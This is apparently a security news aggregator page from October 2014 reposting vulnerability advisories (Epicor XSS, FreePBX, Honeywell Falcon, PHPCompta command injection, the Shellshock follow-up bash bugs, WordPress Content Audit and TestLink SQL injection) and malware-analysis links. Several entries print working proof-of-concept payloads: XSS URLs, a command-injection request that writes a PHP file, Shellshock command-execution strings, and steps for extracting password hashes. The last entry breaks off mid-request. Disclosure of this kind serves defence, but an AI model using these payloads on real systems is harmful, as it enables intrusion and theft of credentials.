Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Fynloski dropper and .NET PWS (pass stealer) Analysis

September 30, 2014, 5:23 pm
$
0
0
Again the malware sample came to me via spam camp, and caught in corporate network’s honeypot.

more here...........http://www.133tsec.com/2014/09/29/fynloski-dropper-and-net-pws-pass-stealer-analysis/
Search

Epicor Enterprise vulnerabilities

October 1, 2014, 2:54 am
$
0
0
"Epicor Enterprise vulnerabilities"

- Affected vendor: Epicor Software Corporation
- Affected system: Epicor Enterprise - Version 7.4
- Vendor disclosure date: May 13th, 2014
- Public disclosure date: September 30th, 2014
- Status: Fixed

- Associated CVEs:

  1) CVE-2014-4311
  Password values not masked appropriately:
  Even though the application appears to be masking the affected password values
in the database connection and email settings page, it is possible to access
their content by observing the HTML code.

  Affected password values:
  - “Database Connection”
  - “E-mail Connection”

  Associated CAPEC:
  CAPEC-167: Lifting Sensitive Data from the Client -
https://capec.mitre.org/data/definitions/167.html

  Associated CWE:
  CWE-200: Information Exposure - http://cwe.mitre.org/data/definitions/200.html

  2) CVE-2014-4312
  Persistent and reflective cross-site scripting (XSS) attacks possible:
  The identified website is vulnerable to persistent and reflective cross-site
scripting. Script injection is a weakness within an application, and is due to
insufficient validation of the input data (i.e. input data being sent from the
user/presentation layer) and output encoding allowing dynamic execution of
scripts on the application front end resulting in anomalous/abnormal behaviour
of the application.

  Example of affected functionalities for persistent XSS:
   - 1. While viewing Order details, and injecting a malicious payload on the
"Notes" section.
   - 2. While modifying an “Order to consume” and injecting a malicious payload
on the "Description" section.
   - 3. While observing the “Favorites” section and and injecting a malicious
payload on the “Favorites name” section.
     Example of an injected payload: <script>alert("XSS")</script>

  Example of affected URLs for reflective XSS:
  - 1.
https://XXXXX/Procurement/EKPHTML/search_item_bt.asp?RecordsRequested=Yes&FiltPartNo=&FiltSupplier=-1&FiltKeyword=<script>alert("XSS")</script>
  - 2.
https://XXXXX/Procurement/EKPHTML/EnterpriseManager/Budget/ImportBudget_fr.asp?Act=dtt"><script>alert("XSS")</script>
  - 3. https://XXXXX
/Procurement/EKPHTML/EnterpriseManager/UserSearchDlg.asp?hdnPageName=UserSearch&hdnOpenerFormName=PrefApp&hdnApproverFieldName=temp1&hdnApproverIDFieldName=temp2&hdnUserID=200&hdnOpener=Test"><script>alert("XSS")</script>
  - 4.
https://XXXXX/Procurement/EKPHTML/EnterpriseManager/UserSearchDlg.asp?hdnOpenerFormName=PrefApp&hdnApproverFieldName="><script>alert("XSS")</script>
  - 5.
https://XXXXX/Procurement/EKPHTML/EnterpriseManager/Codes.asp?INTEGRATED=XSS">--><script>alert("XSS")</script>

  Associated CAPEC:
  CAPEC-32: Embedding Scripts in HTTP Query Strings -
https://capec.mitre.org/data/definitions/32.html

  Associated CWE:
  CWE-79: Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting') - http://cwe.mitre.org/data/definitions/79.html

- Available fix:
  Epicor Enterprise Hotfix: FS74SP6_HotfixTL054181

- Credit:
  These vulnerabilities were discovered by Fara Rustein.
  If you have any questions, comments, concerns, updates or suggestions please
contact Fara Rustein (TW: @fararustein).

Google’s DoubleClick ad network abused once again in malvertising attacks

October 1, 2014, 2:59 am
$
0
0
Last week we uncovered a large-scale malvertising attack involving Google’s DoubleClick and Zedo that affected many high-profile sites.

Unfortunately, another incident where DoubleClick is part of the advertising chain has happened again.

more here...........https://blog.malwarebytes.org/malvertising-2/2014/09/googles-doubleclick-ad-network-abused-once-again-in-malvertising-attacks/

FreePBX (All Versions) RCE

October 1, 2014, 3:00 am
$
0
0
We would like to announce that a significant security vulnerability has
been discovered in all current versions of FreePBX.

A CVE has been requested from Mitre, but has yet to be provided.

Further details as they come to hand will be available from
http://community.freepbx.org/t/critical-freepbx-rce-vulnerability-all-versions/24536
which should be treated as the authoritative source of nformation. The CVE,
when provided, will be linked from there.

There is also futher information available there about how to detect and
remove any potential intrusion to your FreePBX machine.

Summary:
A remote attacker can bypass authentication and create a false FreePBX
Administrator account, which will then let them perform any action on a
FreePBX system as the FreePBX user (which is often ‘asterisk’ or ‘apache’).

This vulnerability is caused by the improper use of ‘unserialize’ in a
legacy package that has been deprecated in the latest versions of FreePBX,
but is still in common use.

An emergency security release has been pushed to resolve this for all
supported versions (12, 2.11, and 2.10) as well as an emergency backport to
2.9, which is outside of our normal supported environment.

If you are running a version prior to 2.9, and are unable to upgrade, the
patch is available below.

The fixed module versions are:
2.9: fw_ari v2.9.0.9
2.10: fw_ari v2.11.1.5
2.11: fw_ari v2.11.1.5 (not a typo, it’s the same module version)

In FreePBX 12 ARI is deprecated in favour of the new User Control Panel,
but ARI is available as a legacy package if required, as version 12.0.5.

All versions lower than this are vulnerable and should be removed if unable
to be upgraded.

Note that disabling them will NOT resolve this issue, the files must be
removed or patched.

This issue was discovered by a signature verification failure on a FreePBX
12 system, and the attack appeared to be scripted. As such, this attack
should be considered to be ‘in the wild’, and upgrades should be actioned
with the utmost urgency.

FreePBX and Schmooze takes security very seriously, and treat all security
issues as a critical event.  We urge anyone who has discovered a security
vulnerability in FreePBX, or its associated projects, to email
security@freepbx.org for an immediate response.

We also continue our recommendation that your FreePBX machines are
explicitly firewalled from public access from the internet.

Additional Details:

Overall CVSS Score - 6

CVSS Base Score - 9.4
Impact Subscore - 9.2
Exploitability Subscore - 10
CVSS Temporal Score  - 7.4
CVSS Environmental Score - 6
Modified Impact Subscore - 8

Link to patch:
https://github.com/FreePBX/fw_ari/commit/f294b4580ce725ca3c5e692d86e63d40cef4d836

FreePBX Security Team,
Schmooze Com Inc

CVE-2014-2717 SCADA Privilege Escalation in Honeywell Falcon XLWEB

October 1, 2014, 3:02 am
$
0
0
After giving the market two extra months for patching and also
contacting some of the affected national CERTs Outpost24 today released
the vulnerability details for CVE-2014-2717.
This vulnerability consists of a missing access restriction in
combination with a flawed login function, resulting in something as
exotic as a pass the hash vulnerability to authenticate with a SCADA
system, giving administrative access.*

*TL;DR; The Honeywell Falcon (XLWeb Linux/Webserver) contains a
vulnerability which allows anyone, even without knowing the username or
password, to log in as an administrator in the system. Although
information regarding the presence of the vulnerability has been
available for a few months since its open disclosure by the ISC CERT to
member organizations, there are multiple unpatched systems that remain
exposed to the Internet. Outpost24 have waited for an airport we were
aware of were affected to patch before releasing.

The more full information is available here;
http://www.outpost24.com/cve-2014-2717-attacking-the-honeywell-falcon-xlweb/

References:
https://ics-cert.us-cert.gov/advisories/ICSA-14-175-01
CVE-2014-2717


AFFECTED PRODUCTS
The following Honeywell FALCON XLWeb controller versions are affected:

  * FALCON Linux 2.04.01 or older
  * FALCON XLWebExe 2.02.11 or older.

IMPACT
An attacker may use these vulnerabilities to generate a valid login for
an administrative user in the Honeywell FALCON XLWeb controller
obtaining full administrator access to the system.

The impact to individual organizations depends on many factors that are
unique to each organization. ICS-CERT recommends that organizations
evaluate the impact of this vulnerability based on their operational
environment, architecture and product implementation.

The affected products, FALCON XLWeb controllers, are web-based SCADA
systems. According to Honeywell, FALCON XLWeb controllers are deployed
across several industries including critical manufacturing, energy and
wastewater systems among others. According to Honeywell, the affected
controllers are used by customers primarily in Europe and the Middle East.

Outpost24 would like to direct a thank you to Honeywell and ICS CERT for
their fast work in resolving the problems, and we also completely share
the vendors recommendation that SCADA systems already in the first place
should not be internet facing. The vendor have been a pleasure to work
with and have taken every care to resolve the issue timely.


Martin Jartelius
CSO
Outpost24
www.outpost24.com

Multiple product vulnerabilities: all TP-Link "2-series" switches, all TP-Link VxWorks-based product

October 1, 2014, 3:06 am
$
0
0
Vendor affected: TP-Link (http://tp-link.com)

Products affected:
  * All TP-Link VxWorks-based devices (confirmed by vendor)
  * All "2-series" switches (confirmed by vendor)
  * TL-SG2008 semi-managed switch (confirmed by vendor)
  * TL-SG2216 semi-managed switch (confirmed by vendor)
  * TL-SG2424 semi-managed switch (confirmed by vendor)
  * TL-SG2424P semi-managed switch (confirmed by vendor)
  * TL-SG2452 semi-managed switch (confirmed by vendor)

Vulnerabilities:
  * All previously-reported VxWorks vulnerabilities from 6.6.0 on;
    at the very least:
    * CVE-2013-0716 (confirmed by vendor)
    * CVE-2013-0715 (confirmed by vendor)
    * CVE-2013-0714 (confirmed by vendor)
    * CVE-2013-0713 (confirmed by vendor)
    * CVE-2013-0712 (confirmed by vendor)
    * CVE-2013-0711 (confirmed by vendor)
    * CVE-2010-2967 (confirmed by vendor)
    * CVE-2010-2966 (confirmed by vendor)
    * CVE-2008-2476 (confirmed by vendor)
  * SSLv2 is available and cannot be disabled unless HTTPS is
    completely disabled (allows downgrade attacks)
    (confirmed by vendor)
  * SSL (v2, v3) offers insecure cipher suites and HMACs which cannot
    be disabled (allows downgrade attacks)
    (confirmed by vendor)

Design flaws:
  * Telnet is available and cannot be disabled (confirmed by vendor)
  * SSHv1 enabled by default if SSH is enabled (confirmed by vendor)

Vendor response:
  TP-Link are not convinced that these flaws should be repaired.

  TP-Link's Internet presence -- or at least DNS -- is available only
  intermittently. Most emails bounced. Lost contact with vendor, but
  did confirm that development lead is now on holiday and will not
  return for at least a week.

  Initial vendor reaction was to recommend purchase of "3-series"
  switches. Vendor did not offer reasons why "3-series" switches would
  be more secure, apart from lack of telnet service. Vendor confirmed
  that no development time can be allocated to securing "2-series"
  product and all focus has shifted to newer products.

  (TL-SG2008 first product availability July 2014...)

  Vendor deeply confused about security of DES/3DES, MD5, claimed that
  all security is relative. ("...[E]ven SHA-1 can be cracked, they just
  have different security level.")

Fix availability:
  None.

Work-arounds advised:
  None possible. Remove products from network.



Authored by kvnjs 
kvnjs@riseup.net



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Lacoon Discovers Xsser mRAT, the First Advanced iOS Trojan

October 1, 2014, 3:13 am
$
0
0
The Lacoon Mobile Security research team has discovered a new mRAT it calls “Xsser mRAT.” The Xsser mRAT specifically targets iOS devices, and is related to Android spyware already distributed broadly in Hong Kong.

more here.........https://www.lacoon.com/lacoon-discovers-xsser-mrat-first-advanced-ios-trojan/

OpenVPN ShellShock PoC

October 1, 2014, 4:12 am
$
0
0
# OpenVPN ShellShock PoC
# Based on Fredrik Strömberg's HN post: https://news.ycombinator.com/item?id=8385332
# Verified by @fj33r, posted at: http://sprunge.us/BGjP

PoC here............http://pastebin.com/VyMs3rRd
Search

Digging deep into Angler Fileless Exploit delivery

October 1, 2014, 4:16 am
$
0
0
We look in detail about Angler Exploit pack’s fileless infection. Thanks to friends at malware-traffic-analysis.net who provided captures of two different instances of Angler exploit pack delivery. You can download the samples and captures from these links Link1, Link2. There is one technical blog about this infection chain. I am going to add in some more information about this particular instance.

more here...........http://hiddencodes.wordpress.com/2014/10/01/digging-deep-into-angler-fileless-exploit-delivery-2/

Quick and dirty configuration of Viper to add "cloud" support

October 1, 2014, 4:43 am
$
0
0
    Viper is an open source framework designed to assist malware analysis. You can find more information here. I really like this framework and use it every day. However, it is not possible to natively use it in the "cloud", Viper does not provide a server and a multi-user support. I'll describe here a configuration to add this feature.  more here..........http://r00ted.com/Quick_and_dirty_viper_configuration.html


Blind SQLi vulnerability in Content Audit could allow a privileged attacker to exfiltrate password hashes (WordPress plugin)

October 1, 2014, 7:29 am
$
0
0
Details
================
Software: Content Audit
Version: 1.6
Homepage: http://wordpress.org/plugins/content-audit/
Advisory report: https://security.dxw.com/advisories/blind-sqli-vulnerability-in-content-audit-could-allow-a-privileged-attacker-to-exfiltrate-password-hashes/
CVE: CVE-2014-5389
CVSS: 3.6 (Low; AV:N/AC:H/Au:S/C:P/I:N/A:P)

Description
================
Blind SQLi vulnerability in Content Audit could allow a privileged attacker to exfiltrate password hashes

Vulnerability
================
An attacker with an admin account is able to add arbitrary text in the “Audited content types” option by using a DOM inspector to modify the value of a checkbox field. This text is then inserted into an SQL query and executed as part of a daily wp-cron job.
The fact that this is run only once a day makes it rather minor. An attacker would potentially need to poll /wp-cron.php repeatedly for 24 hours until they got the first result. As blind SQL injection attacks are usually done by comparing the first character to all possible characters – one at a time, until a match is found – it would take a very long time to exfiltrate useful data.
However, we don’t discount the possibility that someone cleverer than us could figure out a more practical attack.

Proof of concept
================
Steps an attacker may take:

Visit /wp-admin/options-general.php?page=content-audit
Check an “Audited content types” checkbox
Right-click that checkbox and select “Inspect element”
Set the value attribute of the element to something which does sleep(5) if the first byte of the admin’s password hash is ‘a’ or sleep(10) otherwise
Press “Update Options”
Poll /wp-cron.php repeatedly until it takes longer than 5 seconds and record how long the request took
Repeat

Steps to take to verify that this issue exists:

Visit /wp-admin/options-general.php?page=content-audit
Check a “Audited content types” checkbox
Right-click that checkbox and select “Inspect element”
Set the value attribute of the element to “‘” (a single apostrophe)
Press “Update Options”
Add “add_action(‘init’, ‘content_audit_mark_outdated’);” to content-audit-schedule.php somewhere and load any page
This error should occur: “WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘2013-08-12′”
If you replace “$oldposts = $wpdb->get_results” with “echo” on line 134 of content-audit-schedule.php you’ll notice that it’s inserting the ‘ unescaped – which means that you can insert whatever you like


Mitigations
================
You should update to version 1.62.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2014-08-11 – Discovered
2014-08-21 – Requested author email address via a contact form
2014-08-27 – Reported to author via email
2014-09-22 – No response from author; reminder sent
2014-09-23 – Author responded
2014-09-24 – Fix released
2014-10-01 – Published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

CVE-2014-6389 - Remote Command Execution in PHPCompta/NOALYSS

October 1, 2014, 7:30 am
$
0
0
Vulnerability title: Remote Command Execution in PHPCompta/NOALYSS
CVE: CVE-2014-6389
Vendor: PHPCompta
Product: PHPCompta/NOALYSS
Affected version: 6.7.1 5638
Fixed version: 6.7.2
Reported by: Jerzy Kramarz

Details:

PhpCompta 6.7.1-2 does not validate the syntax of the commands when processing backup requests from users. It is possible to abuse the 'd' parameter to inject additional parameters that will then be passed via the php passthru() function to create a backup file, which will subsequently be executed. The proof of concept below will create a file 'exploit.php' in the root directory of the application, which will execute phpinfo() function when called.

GET /phpcompta/backup.php?sa=b&t=m&d=123;%20echo%20%22%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%22%20>%20exploit.php HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3nckv75pburv54tm2iq79dfgl6
Connection: keep-alive

Further details at:

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-6389/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.


###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company,
registered in England in accordance with the Companies
Act under number 02763799. The registered office
address of Portcullis Computer Security Limited is:
Portcullis House, 2 Century Court, Tolpits Lane, Watford,
United Kingdom, WD18 9RS.
The information in this email is confidential and may be
legally privileged. It is intended solely for the addressee.
Any opinions expressed are those of the individual and
do not represent the opinion of the organisation. Access
to this email by persons other than the intended recipient
is strictly prohibited.
If you are not the intended recipient, any disclosure,
copying, distribution or other action taken or omitted to be
taken in reliance on it, is prohibited and may be unlawful.
When addressed to our clients any opinions or advice
contained in this email is subject to the terms and
conditions expressed in the applicable Portcullis Computer
Security Limited terms of business.
###############################################################

#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared
by MailMarshal.
#####################################################################################

The other bash RCEs (CVE-2014-6277 and CVE-2014-6278)

October 1, 2014, 7:33 am
$
0
0
== Background ==

If you are not familiar with the original bash function export
vulnerability (CVE-2014-6271), you may want to have a look at this
article:

http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html

Well, long story short: the initial maintainer-provided patch for this
issue [1] (released on September 24) is *conclusively* broken.

After nagging people to update for a while [5] [7], I wanted to share
the technical details of two previously non-public issues which may be
used to circumvent the original patch: CVE-2014-6277 and
CVE-2014-6278.

Note that the issues discussed here are separate from the three
probably less severe problems publicly disclosed earlier on: Tavis'
limited-exploitability EOL bug (CVE-2014-7169) and two likely
non-exploitable one-off issues found by Florian Weimer and Todd Sabin
(CVE-2014-7186 and CVE-2014-7187).

== Required actions ==

If you have installed just the September 24 patch [1], or that and the
follow-up September 26 patch for CVE-2014-7169 [2], you are likely
still vulnerable to RCE and need to update ASAP, as discussed in [5].

You are safe if you have installed the unofficial function prefix
patch from Florian Weimer [3], or its upstream variant released on
September 28 [4]. The patch does not eliminate the problems, but
shields the underlying parser from untrusted inputs under normal
circumstances.

Note: over the past few days, Florian's patch has been picked up by
major Linux distros (Red Hat, Debian, SUSE, etc), so there is a
reasonable probability that you are in good shape. To test, execute
this command from within a bash shell:

foo='() { echo not patched; }' bash -c foo

If you see "not patched", you probably want upgrade immediately. If
you see "bash: foo: command not found", you're OK.

== Vulnerability details: CVE-2014-6277 (the more involved one) ==

The following function definition appearing in the value of any
environmental variable passed to bash will lead to an attempt to
dereference attacker-controlled pointers (provided that the targeted
instance of bash is protected only with the original patches [1][2]
and does not include Florian's fix):

() { x() { _; }; x() { _; } <<a; }

A more complete example leading to a deref of 0x41414141 would be:

HTTP_COOKIE="() { x() { _; }; x() { _; } <<`perl -e '{print
"A"x1000}'`; }" bash -c :

bash[25662]: segfault at 41414141 ip 00190d96 sp bfbe6354 error 4 in
libc-2.12.so[110000+191000]

(If you are seeing 0xdfdfdfdf, see note later on).

The issue is caused by an uninitialized here_doc_eof field in a REDIR
struct originally created in make_redirection(). The initial segv will
happen due to an attempt to read and then copy a string to a new
buffer through a macro that expands to:

strcpy (xmalloc (1 + strlen (redirect->here_doc_eof)), (redirect->here_doc_eof))

This appears to be exploitable in at least one way: if here_doc_eof is
chosen by the attacker to point in the vicinity of the current stack
pointer, the apparent contents of the string - and therefore its
length - may change between stack-based calls to xmalloc() and
strcpy() as a natural consequence of an attempt to pass parameters and
create local variables. Such a mid-macro switch will result in an
out-of-bounds write to the newly-allocated memory.

A simple conceptual illustration of this attack vector would be:

-- snip! --
char* result;
int len_alloced;

main(int argc, char** argv) {

  /* The offset will be system- and compiler-specific */;
  char* ptr = &ptr - 9;

  result = strcpy (malloc(100 + (len_alloced = strlen(ptr))), ptr);

  printf("requested memory = %d\n"
         "copied text = %d\n", len_alloced + 1, strlen(result) + 1);

}
-- snip! --

When compiled with the -O2 flag used for bash, on one test system,
this produces:

requested memory = 2
copied text = 28

This can lead to heap corruption, with multiple writes possible per
payload by simply increasing the number of malformed here-docs. The
consequences should be fairly clear.

[ There is also a latter call to free() on here_doc_eof in
dispose_cmd.c, but because of the simultaneous discovery of the much
simpler bug '78 discussed in the next section, I have not spent a
whole lot of time trying to figure out how to get to that path. ]

Perhaps notably, the ability to specify attacker-controlled addresses
hinges on the state of --enable-bash-malloc and --enable-mem-scramble
compile-time flags; if both are enabled, the memory returned by
xmalloc() will be initialized to 0xdf, making the prospect of
exploitation more speculative (essentially depending on whether the
stack or any other memory region can be grown to overlap with
0xdfdfdfdf). That said, many Linux distributions disable one or both
flags and are vulnerable out-of-the-box. It is also of note that
relatively few distributions compile bash as PIE, so there is little
consolation to be found in ASLR.

Similarly to the original vulnerability, this issue can be usually
triggered remotely through web servers such as Apache (provided that
they invoke CGI scripts or PHP / Python / Perl / C / Java servlets
that rely on system() or popen()-type libcalls); through DHCP clients;
and through some MUAs and MTAs. For a more detailed discussion of the
exposed attack surface, refer to [6].

== Vulnerability details: CVE-2014-6278 (the "back to the '90s" one) ==

The following function definition appearing in the value of any
environmental variable passed to bash 4.2 or 4.3 will lead to
straightforward put-your-command-here RCE (again, provided that the
targeted instance is not protected with Florian's patch):

() { _; } >_[$($())] { echo hi mom; id; }

A complete example looks like this:

HTTP_COOKIE='() { _; } >_[$($())] { echo hi mom; id; }' bash -c :

...or:

GET /some/script.cgi HTTP/1.0
User-Agent: () { _; } >_[$($())] { id >/tmp/hi_mom; }

Note that the PoC does not work as-is in more ancient versions of
bash, such as 2.x or 3.x; it might have been introduced with
xparse_dolparen() starting with bash 4.2 patch level 12 few years
back, but I have not investigated this in a lot of detail. Florian's
patch is strongly recommended either way.

The attack surface through which this flaw may be triggered is roughly
similar to that for CVE-2014-6277 and the original bash bug [6].

== Additional info ==

Both of these issues were identified in an automated fashion with
american fuzzy lop:

https://code.google.com/p/american-fuzzy-lop

The out-of-the-box fuzzer was seeded with a minimal valid function
definition ("() { foo() { foo; }; >bar; }") and allowed to run for a
couple of hours on a single core.

In addition to the issues discussed above, the fuzzer also hit three
of the four previously-reported CVEs.

I initially shared the findings privately with vendors, but because of
the intense scrutiny that this codebase is under, the ease of
reproducing these results with an open-source fuzzer, and the
now-broad availability of upstream mitigations, there seems to be
relatively little value in continued secrecy.

== References ==

[1] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025
[2] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-026
[3] http://www.openwall.com/lists/oss-security/2014/09/25/13
[4] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027
[5] http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html
[6] http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html
[7] http://www.pcworld.com/article/2688932/improved-patch-tackles-new-shellshock-attack-vectors.html

PS. There are no other bugs in bash.

Authored by Michal Zalewski 
Email: lcamtuf@coredump.cx

Memory leak in Xen hypervisor via RDMSR emulation bug (XSA 108)

October 1, 2014, 8:54 am
$
0
0
Memory leak in Xen hypervisor via RDMSR emulation bug (XSA 108) 


Problem description 
--------------------- 

This is a bug in the upstream Xen. Below is the description provided by 
the Xen Security Team: 

"The MSR range specified for APIC use in the x2APIC access model spans 
256 MSRs. Hypervisor code emulating read and write accesses to these 
MSRs erroneously covered 1024 MSRs. While the write emulation path is 
written such that accesses to the extra MSRs would not have any bad 
effect (they end up being no-ops), the read path would (attempt to) 
access memory beyond the single page set up for APIC emulation." 

In other words, the bug allows a malicious HVM guest to read some 
contents of the hypervisor memory. 


Discussion of practical impact 
-------------------------------- 

This very bug got lots of attention on public forums in the recent days, 
so we think a more detailed discussion is justified. 

This seemingly looks like a serious problem, but if we think a little 
bit about the practical impact the conclusion might be quite different. 

First, there are really no secrets or keys in the hypervisor memory that 
might make a good target for an exploit here. Xen hypervisor does not do 
encryption, neither it deals with any storage subsystems. Also there is 
no explicit guest memory content intermixed with the hypervisor code and 
data. 

But one place to see pieces of potentially sensitive data are the Xen 
internal structures where the guest _registers_ are stored whenever the 
guest execution is interrupted (e.g. because of a trap). These registers 
might contain e.g. (parts of) keys or other secrets, if the guest was 
executing some sensitive crypto operation just before it got interrupted. 

The vulnerability allows to read only a few kB of the hypervisor memory, 
with only relative addressing from the emulated APIC registers page, 
whose address is not known to the attacker. Still, for the exactly 
same systems (same binaries running, same ACPI tables, etc) it's likely 
that the attacker would be able to guess the address of the APIC page. 
However, it is much less probable she would be able to predict what Xen 
structures are located in the adjacent memory. Much less the attacker 
would be able to control what structure are located there, as there 
doesn't seem to be many ways of how a malicious HVM might be 
significantly affecting the layout of the hypervisor heap (e.g. force 
arch_vcpu structures of interesting domains to appear nearby). 

Nevertheless, it might happen, by pure coincidence, that an arch_vcpu 
structure with a content of an interesting VM will just happen to be 
located adjacently to the emulated APIC page. 

In that case, the next problem for the attacker would be lack of control 
and knowledge over the target VM execution: even if the attacker were 
somehow lucky to find the other VM's register-holding-structure adjacent 
to the APIC page, it would still be unclear what the target VM was 
executing at the time it was suspended and so, whether the registers 
stored in the structure are worthwhile or not. 

It is thinkable that the attacker might attempt to use some form of a 
heuristic, such as e.g. "if RIP == X, then RAX likely contains (parts 
of) the important key", hoping that this specific RIP would signify a 
specific interesting instruction (e.g. part of some crypto library) 
being executed while the VM was interrupted, and so the key is to be 
found in one of the registers. 

But the attacker's memory reading exploit doesn't offer a comfort of 
synchronization, so even though the attacker might be so extremely lucky 
as to find out that *(apic_page + guessed_offset_to_rip) == X (the 
attacker here assumes the 'guessed_offset_to_rip' is the distance 
between the APIC page and the address where RIP is stored in the 
presumable arch_vcpu structure, that presumably is located adjacently), 
still there is no guarantees that the next read to *(apic_page + 
guest_offset_to_rax) will return the content of RAX from the same moment 
that RIP was snapshot (and which the attacker considered interesting). 

Arguably the attacker might try to fire up the attack continuously, thus 
increasing chances of success. Assuming this won't cause system to crash 
due to accessing non-mapped memory, this might sound like a somehow good 
strategy. 

However, in case of a desktop system like Qubes OS, the attacker has 
very limited control over other domains. Unlike as in case of attacking 
a VM playing a role of a Web server for instance, the attacker probably 
won't be able to force the target VMs to do lots of repeated crypto 
operations, neither choose moments when the target VM traps. 

It seems like exploiting this bug in an IaaS scenario might be more 
practical, though, as the attacker also has some control of domain 
creation/termination, so can affect Xen heap to some extent. But on a 
system like Qubes OS, it seems unlikely. 

So, are we doomed? We likely are, but probably not because of this bug. 


Patching 
---------- 

The specific packages that resolve the problems mentioned 
in this bulletin have been uploaded to the current-testing repo: 

* Xen packages version 4.1.6.1-16 

The packages are to be installed in Dom0 via qubes-dom0-update command 
or via the Qubes graphical manager. 

A system restart will be required afterwards. 

If you use Anti Evil Maid, you will need to reseal your secret 
passphrase to new PCR values, as PCR14 will change because of a new 
xen.gz binary. 


References 
------------ 

[1] http://xenbits.xen.org/xsa/advisory-108.html 


Thanks, 
joanna. 

-- 
The Qubes Security Team 
http://wiki.qubes-os.org/trac/wiki/SecurityPage 

Same-Origin Policy Potential Issue of iOS UIWebView

October 1, 2014, 8:57 am
$
0
0
I found same-origin policy potential issue on stringByEvaluatingJavaScriptFromString method of UIWebView. When you use this method at shouldStartLoadWithRequest with http redirect, javascript will be executed on wrong domain.

more here.........http://harupuxa.blogspot.jp/2014/10/same-origin-policy-potential-issue-of.html
Search

Thumb Drives.. Can you tell the difference?

October 1, 2014, 8:59 am
$
0
0
During a physical penetration test, it is not uncommon for the tester (attacker) to drop usb thumb drives out in the parking lot or someplace within the building.  The hope is that an employee will pick it up and connect it to their computer.  The end goal: malware that makes a connection back to the attacker.

more here..........http://blog.secureideas.com/2014/10/thumb-drives-can-you-tell-difference.html

Apple Releases Patch for Shellshock, May Still Be Vulnerable

October 1, 2014, 9:00 am
$
0
0
Yesterday, Apple released security updates that address two of the "Shellshock" bash vulnerabilities: CVE-2014-6271 and CVE-2014-7169. At the time of writing, the updates are not available using Software Update on OS X. Instead, users should download the package directly from Apple's web site to install it. Updates are available for 10.7 (Lion), 10.8 (Mountain Lion) and 10.9 (Mavericks).

Amidst the flurry of activity and interest around Shellshock over the last week, several additional bash vulnerabilities have come to light.

more here..........https://community.rapid7.com/community/infosec/blog/2014/09/30/apple-releases-patch-for-shellshock-may-still-be-vulnerable


ComputerCOP: The Dubious 'Internet Safety Software' That Hundreds of Police Agencies Have Distributed to Families

October 1, 2014, 9:01 am
$
0
0
For years, local law enforcement agencies around the country have told parents that installing ComputerCOP software is the “first step” in protecting their children online.

Police chiefs, sheriffs, and district attorneys have handed out hundreds of thousands of copies of the disc to families for free at schools, libraries, and community events, usually as a part of an “Internet Safety” outreach initiative. The packaging typically features the agency’s official seal and the chief’s portrait, with a signed message warning of the “dark and dangerous off-ramps” of the Internet.

As official as it looks, ComputerCOP is actually just spyware

more here...........https://www.eff.org/deeplinks/2014/09/computercop-dangerous-internet-safety-software-hundreds-police-agencies

CVE-2014-5308 - Multiple SQL Injection Vulnerabilities in TestLink

October 1, 2014, 9:55 am
$
0
0
Vulnerability title: Multiple SQL Injection Vulnerabilities in TestLink
CVE: CVE-2014-5308
Vendor: Testlink
Product: TestLink
Affected version: 1.9.11
Fixed version: Fixed in SVN commit number 7a09973
Reported by: Jerzy Kramarz

Details:

Two SQL injection vulnerabilities have been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from Multiple SQL injections:

Vulnerability 1 (Fixed in commit #7a09973 in official repository)

<pre>

POST /testlink/lib/project/projectView.php?doAction=search HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.56.101/testlink/lib/project/projectEdit.php
Cookie: [...]
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 200

CSRFName=CSRFGuard_1740781925&CSRFToken=b16[...]&name=<SQL Injection>&search=Search%2FFilter

</pre>

Vulnerability 2 (Fixed in patches after commit #7a09973 in official repository)

<pre>

POST /testlink/lib/events/eventinfo.php HTTP/1.1
Content-Length: 6
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
Host: 192.168.56.101
